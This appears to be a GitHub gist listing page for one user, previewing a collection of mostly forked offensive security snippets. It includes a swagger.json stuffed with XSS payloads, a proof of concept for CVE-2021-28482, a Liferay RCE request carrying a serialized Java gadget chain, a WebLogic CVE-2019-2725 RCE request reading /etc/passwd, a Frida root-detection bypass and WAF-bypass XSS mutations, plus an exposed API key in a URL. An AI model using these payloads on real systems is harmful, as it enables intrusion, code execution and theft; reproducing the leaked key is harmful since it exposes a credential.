Skip to content

Instantly share code, notes, and snippets.

View chouaibhm's full-sized avatar

chouaib Hm chouaibhm

149 followers · 891 following
View GitHub Profile
@chouaibhm
chouaibhm / concurrency.go
Created October 2, 2021 10:48 — forked from hahwul/concurrency.go
Go concurrency
package main
import (
"fmt"
"strconv"
"sync"
)
func main() {
fmt.Println("vim-go")
@chouaibhm
chouaibhm / swagger.json
Last active September 23, 2021 20:14
{ "swagger": "2.0", "info": { "title": "/qqq'\"><b style='x: expression(alert(1))'>", "description": "/rrr'\"><b style='x: expression(alert(1))'>", "version": "2017-06-04T22:56:06+00:00", "contact": { "name": "/sss'\"></script><img src=x onerror=alert(document.domain)>", "url": "javascript:alert(document.domain)", "email": "x@c.se" } }, "host": "xok", "basePath": "/\"'>eee<img src=x onerror=alert(document.domain)>", "schemes": [ "https" ], "consumes": [ "/ttt'\"></script></select>fff<img src=x onerror=alert(document.domain)>" ], "produces": [ "/uuu'\"></script>ggg<img src=x onerror=alert(document.domain)>" ], "securityDefinitions": { "oauth2": { "flow": "implicit", "authorizationUrl": "javascript:alert(document.domain)//", "scopes": { "web-api": "testing" }, "type": "oauth2" } }, "security": [ { "tokenHeader": ["/xxx'\"><img src=x onerror=alert(document.domain)>"] } ], "paths": { "/><img src=x onerror=alert(document.domain)>": { "post": { "summary": "/'\">bbb</script><img src=x onerror=alert(document.domain)>
@chouaibhm
chouaibhm / JavascriptRecon.md
Created August 8, 2021 20:52 — forked from fuckup1337/JavascriptRecon.md
My Javascript Recon Process - BugBounty

Description

This is a simple guide to perform javascript recon in the bugbounty

Steps

  • The first step is to collect possibly several javascript files (more files = more paths,parameters -> more vulns)
@chouaibhm
chouaibhm / PoC_CVE-2021-28482.py
Created May 5, 2021 19:53 — forked from testanull/PoC_CVE-2021-28482.py
PoC of CVE-2021-28482
import requests
import time
import sys
from base64 import b64encode
from requests_ntlm2 import HttpNtlmAuth
from urllib3.exceptions import InsecureRequestWarning
from urllib import quote_plus
requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
@chouaibhm
chouaibhm / LiferayRce.txt
Created May 3, 2021 05:50 — forked from Mad-robot/LiferayRce.txt
POST /api/jsonws/invoke HTTP/1.1
Host: <Host>
Connection: close
cmd2: whoami
Content-Type: application/x-www-form-urlencoded
Content-Length: 4910
cmd={"/expandocolumn/update-column":{}}&p_auth=<valid token>&formDate=<date>&columnId=123&name=asdasd&type=1&defaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource={"userOverridesAsString":"HexAsciiSerializedMap:ACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E73
@chouaibhm
chouaibhm / Amass Config
Created April 30, 2021 01:24 — forked from PatrikFehrenbach/Amass Config
# Copyright 2017-2020 Jeff Foley. All rights reserved.
# Use of this source code is governed by Apache 2 LICENSE that can be found in the LICENSE file.
# Should results only be collected passively and without DNS resolution? Not recommended.
#mode = passive
mode = active
# The directory that stores the Cayley graph database and other output files
# The default for Linux systems is: $HOME/.config/amass
#output_directory = amass
@chouaibhm
chouaibhm / test
Created December 19, 2020 13:29
https://ipgeolocation.abstractapi.com/v1/?api_key=5ff38bb958864eb7995bfe960bed76a2&ip_address=102.27.170.66
@chouaibhm
chouaibhm / CVE-2019-2725.md
Last active November 11, 2020 10:07 — forked from pikpikcu/CVE-2019-2725.md
CVE-2019-2725 weblogic ver:10.3.6 RCE

POST Request with burpsuite

POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: 127.0.0.1
User-Agent: Apache-HttpClient/4.1.1 (java 1.5)
Content-Type: text/xml
SOAPAction: ""
Content-Length: 175816
CMD: cat /etc/passwd
Connection: close
@chouaibhm
chouaibhm / root_bypass.js
Created September 27, 2020 16:53 — forked from pich4ya/root_bypass.js
Bypass Android Root Detection / Bypass RootBeer - August 2019
// $ frida -l antiroot.js -U -f com.example.app --no-pause
// CHANGELOG by Pichaya Morimoto (p.morimoto@sth.sh):
// - I added extra whitelisted items to deal with the latest versions
// of RootBeer/Cordova iRoot as of August 6, 2019
// - The original one just fucked up (kill itself) if Magisk is installed lol
// Credit & Originally written by: https://codeshare.frida.re/@dzonerzy/fridantiroot/
// If this isn't working in the future, check console logs, rootbeer src, or libtool-checker.so
Java.perform(function() {
var RootPackages = ["com.noshufou.android.su", "com.noshufou.android.su.elite", "eu.chainfire.supersu",
@chouaibhm
chouaibhm / mutation_a.txt
Created June 18, 2020 16:33 — forked from hackerscrolls/mutation_a.txt
Mutation points in <a> tag for WAF bypass
<a[1]href[2]=[3]"[4]java[5]script:[6]alert(1)">
[1]
Bytes:
\x09 \x0a \x0c \x0d \x20 \x2f
<a/href="javascript:alert(1)">
<a\x09href="javascript:alert(1)">
[2,3]